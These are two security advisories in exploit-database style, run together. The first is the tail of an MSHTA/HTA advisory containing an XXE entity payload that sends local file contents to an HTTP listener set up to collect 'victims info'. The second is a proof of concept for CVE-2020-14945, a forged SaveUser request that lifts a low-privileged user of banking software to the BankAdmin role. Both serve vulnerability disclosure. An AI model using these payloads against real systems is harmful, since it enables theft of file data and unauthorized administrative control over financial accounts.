<!ENTITY % all "<!ENTITY send SYSTEM 'http://127.0.0.1:8000?%file;'>">
%all;
3) Local Python v3 web-server listening on port 8000 to receive victims info.
python -m http.server
[POC Video URL]
https://www.youtube.com/watch?v=XaTrBEu4Ghw
[Network Access]
Remote
[Severity]
High
[Disclosure Timeline]
MSHTA .HTA files are classified untrusted, many threats already well known.
July 4, 2020 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
hyp3rlinx
# Exploit Title: BSA Radar 1.6.7234.24750 - Authenticated Privilege Escalation
# Date: 2020-07-06
# Exploit Author: William Summerhill
# Vendor homepage: https://www.globalradar.com/
# Version: BSA Radar - Version 1.6.7234.24750 and lower
# CVE-2020-14945 - Privilege Escalation
Description: A privilege escalation vulnerability exists within Global RADAR BSA Radar 1.6.7234.X that allows an authenticated, low-privileged user to escalate their privileges to administrator rights (i.e. the "BankAdmin" role) via a forged request to the SaveUser API.
Proof of Concept:
The privilege escalation is achieved by saving the response of the GetUser request (from clicking the username in the top right). When this profile is saved it will send a request to the SaveUserProfile endpoint. This response can be saved and modified (while updating it as needed to escalate privileges to BankAdmin role) then sent to the SaveUser endpoint which is the endpoint used for admins to update privileges of any user. After successful privilege escalation, a user can then access the Administration features and modify the application or accounts, cause further damage to the application and users, or exfiltrate application data.
HTTP Request PoC:
POST /WS/AjaxWS.asmx/SaveUser
{"user":
{"UserID":<CURRENT USER ID>,"Username":"...","Firstname":"...","Lastname":"...","Email":"...","BranchID":"...","Role":"BANKADMIN","WireLimit":"XXXXXXX","BankID":"...","Permissions":["XXXXXXXXXXXXXXX"], <REMAINDER OF REQUEST HERE> } }
The Role, WireLimit and Permissions parameters can be forged to forcefully change your current user permissions to elevate them to a higher role such as BankAdmin with full account modification permissions.
Tested on: Windows
CVE: CVE-2020-14945
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14945